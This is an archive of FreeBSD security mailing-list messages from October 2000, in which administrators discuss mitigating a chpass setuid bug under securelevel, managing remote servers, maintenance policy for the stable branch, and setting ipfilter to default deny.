> default.  Oh well, guess it's time to reboot some hosts. :-/

I do not see any single problem here.

  # clear the immutable flag, then drop the setuid bit
  chflags noschg /usr/bin/chpass
  chmod u-s /usr/bin/chpass

Sounds pretty easy, doesn't it?

--
Alexander Prohorenko, Alkar Teleport

From owner-freebsd-security Thu Oct 5 6:30:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0D4A637B66C for ; Thu, 5 Oct 2000 06:30:17 -0700 (PDT)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id PAA05169; Thu, 5 Oct 2000 15:30:01 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Alex Prohorenko
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net>
From: Dag-Erling Smorgrav
Date: 05 Oct 2000 15:30:00 +0200
In-Reply-To: Alex Prohorenko's message of "5 Oct 2000 13:25:08 GMT"
Message-ID:
Lines: 17
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Alex Prohorenko writes:
> Dima Dorfman wrote:
> > Unfortunately it isn't that easy if you're running with securelevel > 0
> > since chpass is installed with the schg (system immutable) flag on by
> > default.  Oh well, guess it's time to reboot some hosts. :-/
> I do not see any single problem here.
>
> chflags noschg /usr/bin/chpass
> chmod u-s /usr/bin/chpass
>
> Sounds pretty easy, doesn't it?

Except that chflags doesn't work at higher securelevels.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Oct 5 6:36:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id BC0B537B502 for ; Thu, 5 Oct 2000 06:36:30 -0700 (PDT)
Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id UAA02803; Thu, 5 Oct 2000 20:33:49 +0700 (NOVST)
Message-ID: <39DC833C.7DDB0AC2@sentry.granch.ru>
Date: Thu, 05 Oct 2000 20:33:48 +0700
From: "Rashid N. Achilov"
Reply-To: achilov@granch.ru
Organization: Granch Ltd.
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: ru, en
MIME-Version: 1.0
To: Alex Prohorenko
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Alex Prohorenko wrote:
>
> I do not see any single problem here.
>
> chflags noschg /usr/bin/chpass
> chmod u-s /usr/bin/chpass
>
> Sounds pretty easy, doesn't it?

When at securelevel 3 (or 2 too, I don't remember now :-( ) you, even if
root, cannot unset the schg flag :-)

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Brainbench ID: 28514
Granch Ltd. lead engineer, e-mail: achilov@granch.ru
tel/fax (383-2) 24-2363

From owner-freebsd-security Thu Oct 5 7:10:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 9E33B37B66D for ; Thu, 5 Oct 2000 07:10:14 -0700 (PDT)
Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA52489; Thu, 5 Oct 2000 21:09:31 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru)
Date: Thu, 5 Oct 2000 21:09:31 +0700 (NSS)
From: Max Khon
To: achilov@granch.ru
Cc: Alex Prohorenko , freebsd-security@FreeBSD.ORG
Subject: Re: BSD chpass (fwd)
In-Reply-To: <39DC833C.7DDB0AC2@sentry.granch.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

hi, there!

On Thu, 5 Oct 2000, Rashid N. Achilov wrote:

> > I do not see any single problem here.
> >
> > chflags noschg /usr/bin/chpass
> > chmod u-s /usr/bin/chpass
> >
> > Sounds pretty easy, doesn't it?
>
> When at securelevel 3 (or 2 too, I don't remember now :-( ) you, even if
> root, cannot unset the schg flag :-)

securelevel 1 is sufficient: man 8 init

/fjoe

From owner-freebsd-security Thu Oct 5 8:50:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from news.lucky.net (news.lucky.net [193.193.193.102]) by hub.freebsd.org (Postfix) with ESMTP id 96AA837B66C for ; Thu, 5 Oct 2000 08:50:08 -0700 (PDT)
Received: (from mail@localhost) by news.lucky.net (8.Who.Cares/8.Who.Cares) id STG13060 for freebsd-security@freebsd.org; Thu, 5 Oct 2000 18:50:05 +0300 (envelope-from white@alkar.net)
From: Alex Prohorenko
To: freebsd-security@freebsd.org
Subject: Re: BSD chpass (fwd)
Date: 5 Oct 2000 15:49:30 GMT
Organization: Alkar-Teleport News server
Message-ID: <8ri7ua$1h7i$2@pandora.alkar.net>
References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net> <39DC833C.7DDB0AC2@sentry.granch.ru>
User-Agent: tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (FreeBSD/3.5-STABLE (i386))
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Lines: 14
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Rashid N. Achilov wrote:
> Alex Prohorenko wrote:
>> I do not see any single problem here.
>> chflags noschg /usr/bin/chpass
>> chmod u-s /usr/bin/chpass
>> Sounds pretty easy, doesn't it?
> When at securelevel 3 (or 2 too, I don't remember now :-( ) you, even if
> root, cannot unset the schg flag :-)

Sorry, I have missed a line concerning securelevel. Of course, you're
right.

--
Alexander Prohorenko, Alkar Teleport

From owner-freebsd-security Thu Oct 5 9:52:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id AF28B37B503 for ; Thu, 5 Oct 2000 09:52:54 -0700 (PDT)
Received: from netrinsics.com([202.106.213.194]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm1039dcfb7b; Thu, 5 Oct 2000 16:52:44 -0000
Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e95GRBX07405 for freebsd-security@freebsd.org; Fri, 6 Oct 2000 00:27:11 +0800 (+0800) (envelope-from robinson)
Date: Fri, 6 Oct 2000 00:27:11 +0800 (+0800)
From: Michael Robinson
Message-Id: <200010051627.e95GRBX07405@netrinsics.com>
To: freebsd-security@freebsd.org
Subject: Downgrading securelevel on remote servers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>Then they'd go change /etc/rc.  You could set most of your root
>filesystem, including /etc, schg, which may help, but then you'd be
>making your machine almost unmanageable without console access.  For
>example, how would you fix this chpass bug if you couldn't access the
>console and had no way to lower the securelevel, even with a reboot?

The solution I came to for this problem was to use GNU Privacy Guard to
sign scripts in /usr/local/etc/secure, and a script that verified the
signatures and executed them prior to the securelevel being set in
/etc/rc.  If you needed to do something like change the suid bit on
chpass, you would write a script to do that, sign it, install it, reboot,
and remove the script.  The server only kept a copy of the public key
(the keyring was noschg, of course).

I don't need to do that anymore, though, because now I have an OOB Cisco
2509 connected to the console ports on our colocated servers.

	-Michael Robinson

From owner-freebsd-security Thu Oct 5 10: 0:47 2000
Delivered-To: freebsd-security@freebsd.org
Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id 790DA37B502 for ; Thu, 5 Oct 2000 10:00:44 -0700 (PDT)
Received: from netrinsics.com([202.106.228.31]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm439dcfd51; Thu, 5 Oct 2000 17:00:34 -0000
Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e95H22D07580 for freebsd-security@FreeBSD.ORG; Fri, 6 Oct 2000 01:02:02 +0800 (+0800) (envelope-from robinson)
Date: Fri, 6 Oct 2000 01:02:02 +0800 (+0800)
From: Michael Robinson
Message-Id: <200010051702.e95H22D07580@netrinsics.com>
To: freebsd-security@FreeBSD.ORG
Subject: Re: Downgrading securelevel on remote servers
In-Reply-To: <200010051627.e95GRBX07405@netrinsics.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>The server only kept a copy of the public key (the keyring was noschg, of
>course).
                                                                ^^^^^^
                                                                "schg"

	-Michael Robinson

From owner-freebsd-security Thu Oct 5 10: 4:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 204BF37B503; Thu, 5 Oct 2000 10:04:05 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id LAA15026; Thu, 5 Oct 2000 11:03:48 -0600 (MDT)
Message-Id: <4.3.2.7.2.20001005105420.04a7b540@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 05 Oct 2000 11:03:42 -0600
To: Ralph Huntington , "David O'Brien"
From: Brett Glass
Subject: Re: Stable branch
Cc: Paul Richards , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <20001004220906.D50210@dragon.nuxi.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 04:06 AM 10/5/2000, Ralph Huntington wrote:

>Stable branch is very important for production use and should incorporate
>bug fixes and security patches, but not feature enhancements. The extent
>of support and maintenance for stable should be one major release prior to
>the latest release (not current), i.e., since 4.x-RELEASE is the latest,
>then 3.x-STABLE should be supported with bug fixes and security patches
>until a 5.x-RELEASE is out.
>
>Does this seem unreasonable? -=r=-

Perhaps this should be formalized as three branches:

Branch name:    Bug/security   New features?      "Breakable" for
                fixes?                            a day or more?

-PRODUCTION     YES            NO                 NO

-STABLE         YES            YES, PREFERABLY    NO
                               AFTER TESTING
                               IN -CURRENT

-DEVELOPMENT    YES            YES                YES
(formerly -CURRENT)

What do you think of this as a model for what people seem to be asking for?
--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 10:41:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id C146937B678 for ; Thu, 5 Oct 2000 10:41:02 -0700 (PDT)
Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id MAA07435; Thu, 5 Oct 2000 12:40:59 -0500 (CDT) (envelope-from jeff-ml@mountin.net)
Received: from dial-99.max1.wa.cyberlynk.net(207.227.118.99) by peak.mountin.net via smap (V1.3) id sma007431; Thu Oct 5 12:40:54 2000
Message-Id: <4.3.2.20001005120823.00d3b6c0@207.227.119.2>
X-Sender: jeff-ml@207.227.119.2
X-Mailer: QUALCOMM Windows Eudora Version 4.3
Date: Thu, 05 Oct 2000 12:35:15 -0500
To: Michael Robinson , freebsd-security@FreeBSD.ORG
From: "Jeffrey J. Mountin"
Subject: Re: Downgrading securelevel on remote servers
In-Reply-To: <200010051627.e95GRBX07405@netrinsics.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:27 AM 10/6/00 +0800, Michael Robinson wrote:
>The solution I came to for this problem was to use Gnu Privacy Guard to
>sign scripts in /usr/local/etc/secure, and a script that verified the
>signatures and executed them prior to the securelevel being set in /etc/rc.
>
>If you needed to do something like change the suid bit on chpass, you would
>write a script to do that, sign it, install it, reboot, and remove the script.
>The server only kept a copy of the public key (the keyring was noschg, of
>course).

With some thought this should work well.

>I don't need to do that anymore, though, because now I have an OOB Cisco 2509
>connected to the console ports on our colocated servers.

And the somewhat easier, but slower way. Slower in the time involved to hand edit.

See little point in using secure levels if one doesn't protect the mechanism. Dima pointed out the hassle involved, but then extra hassle is to be expected as the security increases. The question always is how far one wishes to go and the costs involved.
YMMV

Jeff Mountin - jeff@mountin.net
Systems/Network Administrator
FreeBSD - the power to serve

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 11:24:55 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7BBB937B503; Thu, 5 Oct 2000 11:24:48 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e95IOkK00529; Thu, 5 Oct 2000 12:24:47 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA00945; Thu, 5 Oct 2000 12:24:46 -0600 (MDT)
Message-Id: <200010051824.MAA00945@harmony.village.org>
To: Ralph Huntington
Subject: Re: Stable branch
Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Thu, 05 Oct 2000 06:06:52 EDT."
References:
Date: Thu, 05 Oct 2000 12:24:46 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Ralph Huntington writes:
: the latest release (not current), i.e., since 4.x-RELEASE is the latest,
: then 3.x-STABLE should be supported with bug fixes and security patches
: until a 5.x-RELEASE is out.
:
: Does this seem unreasonable? -=r=-

Yes and no. It sounds reasonable, but puts a significant burden on
the security officer and his security team to make it happen. Having
two machines for -current and -stable is bad enough, plus test
compiling patches on the last N RELEASES of -stable puts a fair load
on getting an advisory out. Making that include a second branch will
nearly double the work and pita factor to make it happen. When I was
doing 4.0-current, 3.2-stable, 3.2-release, 3.1-release, 3.0-release,
2.2.8-release and 2.2.8-stable regression testing on a couple of
kernel patches it took me a *HUGE* amount of time. 40% of it for 4.x
and 3.x and 60% for the 2.2.8-stable and -release. Why so much for
2.x? The original author of the patch hadn't back ported it, was
disinclined to back port it, so I wound up doing it. This made it
extremely painful to try to get the advisory out (I think it was 6
weeks from the time the bug hit -current until I sent the advisory
out).

Until you pay someone to do this full time, it isn't going to happen.
History has shown this. This suggestion comes up every N years, we do
OK with it for a couple of months until one bug comes along that's
such a pain in the butt that we say "screw this old stuff, I'm just
going to stop doing it because it is too much of a pita and no one
seems to care enough to help." and then are happy for a while until we
cut the next major branch in which case we recapitulate the whole
process.

Sorry to be such a sour puss, but I've "been there, tried that" before.
Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 11:30:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4784637B502; Thu, 5 Oct 2000 11:30:09 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e95IU7K00564; Thu, 5 Oct 2000 12:30:07 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA01024; Thu, 5 Oct 2000 12:30:06 -0600 (MDT)
Message-Id: <200010051830.MAA01024@harmony.village.org>
To: Brett Glass
Subject: Re: Stable branch
Cc: developers@freebsd.org, security@freebsd.org
In-reply-to: Your message of "Thu, 05 Oct 2000 11:03:42 MDT." <4.3.2.7.2.20001005105420.04a7b540@localhost>
References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com>
Date: Thu, 05 Oct 2000 12:30:06 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <4.3.2.7.2.20001005105420.04a7b540@localhost> Brett Glass writes:
: Perhaps this should be formalized as three branches:
:
: Branch name:    Bug/security   New features?      "Breakable" for
:                 fixes?                            a day or more?
:
: -PRODUCTION     YES            NO                 NO
:
: -STABLE         YES            YES, PREFERABLY    NO
:                                AFTER TESTING
:                                IN -CURRENT
:
: -DEVELOPMENT    YES            YES                YES
: (formerly -CURRENT)

Don't change -current's name.

: What do you think of this as a model for what people seem to be
: asking for?

It is what people are asking for, but which committers aren't doing. Until someone can be motivated to do 3.x stuff on a regular basis, several someones actually, it won't happen. Otherwise would do a PR spin with the following patch to 3.x would do the trick (I'd call it -solid, because -stable is suitable for production machines).

Index: newvers.sh
===================================================================
RCS file: /home/imp/FreeBSD/CVS/src/sys/conf/newvers.sh,v
retrieving revision 1.41.2.16
diff -u -r1.41.2.16 newvers.sh
--- newvers.sh	2000/06/20 16:13:59	1.41.2.16
+++ newvers.sh	2000/10/05 18:29:48
@@ -36,7 +36,7 @@
 TYPE="FreeBSD"
 REVISION="3.5"
-BRANCH="STABLE"
+BRANCH="SOLID"
 RELEASE="${REVISION}-${BRANCH}"
 SNAPDATE=""
 if [ "X${SNAPDATE}" != "X" ]; then

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 11:33:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from pike.osd.bsdi.com (pike.osd.bsdi.com [204.216.28.222]) by hub.freebsd.org (Postfix) with ESMTP id B640337B66E; Thu, 5 Oct 2000 11:33:05 -0700 (PDT)
Received: from laptop.baldwin.cx (john@dhcp248.osd.bsdi.com [204.216.28.248]) by pike.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e95IWKi09519; Thu, 5 Oct 2000 11:32:20 -0700 (PDT) (envelope-from jhb@FreeBSD.org)
Message-ID:
X-Mailer: XFMail 1.4.0 on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost>
Date: Thu, 05 Oct 2000 11:32:34 -0700 (PDT)
From: John Baldwin
To: Brett Glass
Subject: Re: Stable branch
Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 05-Oct-00 Brett Glass wrote:
> At 04:06 AM 10/5/2000, Ralph Huntington wrote:
>
>>Stable branch is very important for production use and should incorporate
>>bug fixes and security patches, but not feature enhancements. The extent
>>of support and maintenance for stable should be one major release prior to
>>the latest release (not current), i.e., since 4.x-RELEASE is the latest,
>>then 3.x-STABLE should be supported with bug fixes and security patches
>>until a 5.x-RELEASE is out.
>>
>>Does this seem unreasonable? -=r=-
>
>
> Perhaps this should be formalized as three branches:
>
> Branch name:    Bug/security   New features?      "Breakable" for
>                 fixes?                            a day or more?
>
> -PRODUCTION     YES            NO                 NO

This is called sticking with a release and applying security patches as they are released. It already exists.

> -STABLE         YES            YES, PREFERABLY    NO
>                                AFTER TESTING
>                                IN -CURRENT
>
> -DEVELOPMENT    YES            YES                YES
> (formerly -CURRENT)
>
> What do you think of this as a model for what people seem to be
> asking for?

Seems to be the one we are already using.

> --Brett

--

John Baldwin -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!"
- http://www.FreeBSD.org/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 12:38:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E591937B66C; Thu, 5 Oct 2000 12:38:36 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id PAA38180; Thu, 5 Oct 2000 15:37:46 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Thu, 5 Oct 2000 15:37:46 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: John Baldwin
Cc: Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington
Subject: Re: Stable branch
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I think adding additional active development branches will cause problems, but I think that the following might help:

1) Increased scrutiny of MFC's in advance so that there's less chance of errors being made (explicit pull-up requests, which are used widely in other open source projects)

2) Make release tags into branches, so that ERRATA and other relevant details for a release can be updated sensically, and so that bug fixes can be backported to the release branch by the release engineers or security officers. Maintain security bug support for the last two -RELEASE's, possibly more if there is demand, backport fixes to active and recent -STABLE branches, and also allow new features in those branches given (1).

Having changes possible in the release branch would mean it would be easier to generate binary updates for specific release versions, something that vendors might want to do when offering support for a specific version of FreeBSD. You could imagine even strategically laying down patch level tags on the branch -- 4.1.1-P1 would include a fix for finger, but be otherwise identical, and so on.

These modifications would provide a model for users of FreeBSD releases to get killer bug fixes (the usual few stumbles over the three weeks after a release) and security bug fixes without any support for new features, as feature commits would not be permitted on release branches. Releng (-STABLE) branches would continue to support moderate feature inclusion based on slightly increased reviewing, and -CURRENT would continue to vary in stability widely :-).
Robert N M Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 15: 0:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id B6ADB37B66C for ; Thu, 5 Oct 2000 15:00:08 -0700 (PDT)
Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hJ3a-00060Y-00; Fri, 06 Oct 2000 00:00:02 +0200
Date: Fri, 6 Oct 2000 00:00:02 +0200 (IST)
From: Roman Shterenzon
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Stable branch
In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Oct 2000, Brett Glass wrote:

> Perhaps this should be formalized as three branches:
>
> Branch name:    Bug/security   New features?      "Breakable" for
>                 fixes?                            a day or more?
>
> -PRODUCTION     YES            NO                 NO
>
> -STABLE         YES            YES, PREFERABLY    NO
>                                AFTER TESTING
>                                IN -CURRENT
>
> -DEVELOPMENT    YES            YES                YES
> (formerly -CURRENT)
>
> What do you think of this as a model for what people seem to be
> asking for?

There's too much effort that has to be done to maintain three branches. The stable branch should be stable like the name implies, and it's stable most of the time. I just think that committers have to be a bit more careful when bringing in new features. I still cannot forget the DMA/iso9660 breakage :(

The stable should be great for production, and, don't forget the simple rule - if your system works fine with 0.99alpha version of some software there's absolutely no reason to upgrade or "track" some branch. So, if the security is not important (I cannot believe I'm saying it in the freebsd-security list) then you can just stick with the release you've installed (of course if it works fine), if the security does matter, then you apply the security fixes by hand and stay cool.

Just my 0.02$

P.S. What does it have to do with freebsd-security anyway?!

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 15:39:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 89F2137B503; Thu, 5 Oct 2000 15:39:02 -0700 (PDT)
Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e95McUX01279; Thu, 5 Oct 2000 15:38:34 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com)
To: Robert Watson
Cc: John Baldwin , Brett Glass , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington
Subject: Re: Stable branch
In-Reply-To: Message from Robert Watson of "Thu, 05 Oct 2000 15:37:46 EDT."
Date: Thu, 05 Oct 2000 15:38:29 -0700
Message-ID: <1275.970785509@winston.osd.bsdi.com>
From: Jordan Hubbard
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> 1) Increased scrutiny of MFC's in advance so that there's less chance of

That's perhaps doable, though others have already commented on the difficulties of getting "scrutiny" before the fact in this project so I won't belabor the point.

> 2) Make release tags into branches, so that ERRATA and other relevant

That scares me. I don't like the idea of n-way merges.

- Jordan

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 15:54:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 98DFA37B502 for ; Thu, 5 Oct 2000 15:54:12 -0700 (PDT)
Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id SAA00463 for ; Thu, 5 Oct 2000 18:54:09 -0400
Message-ID: <39DCA41A.8AEEF3FC@allmaui.com>
Date: Thu, 05 Oct 2000 15:54:02 +0000
From: Craig Cowen
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Default Deny
Content-Type: multipart/alternative; boundary="------------C24FBA78FD67B5CF69D96724"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Would someone please remind me how to config my kernel for default deny with ipfilter?

Thanks,

--
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 16: 4:13 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 942BF37B503 for ; Thu, 5 Oct 2000 16:04:08 -0700 (PDT)
Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id KAA22094; Fri, 6 Oct 2000 10:03:57 +1100 (EST)
From: Darren Reed
Message-Id: <200010052303.KAA22094@cairo.anu.edu.au>
Subject: Re: Default Deny
To: craig@allmaui.com (Craig Cowen)
Date: Fri, 6 Oct 2000 10:03:57 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <39DCA41A.8AEEF3FC@allmaui.com> from "Craig Cowen" at Oct 05, 2000 03:54:02 PM
X-Mailer: ELM [version 2.5 PL1]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In some mail from Craig Cowen, sie said:
>
> Would someone please remind me how to config my kernel for default
> deny with ipfilter?
	options IPFILTER_DEFAULT_BLOCK

Darren

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Oct 5 16:37:17 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 4654437B66D; Thu, 5 Oct 2000 16:37:13 -0700 (PDT)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA18801; Thu, 5 Oct 2000 17:37:03 -0600 (MDT)
Message-Id: <4.3.2.7.2.20001005173257.048b9f00@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Thu, 05 Oct 2000 17:36:56 -0600
To: Warner Losh
From: Brett Glass
Subject: Re: Stable branch
Cc: developers@freebsd.org, security@freebsd.org
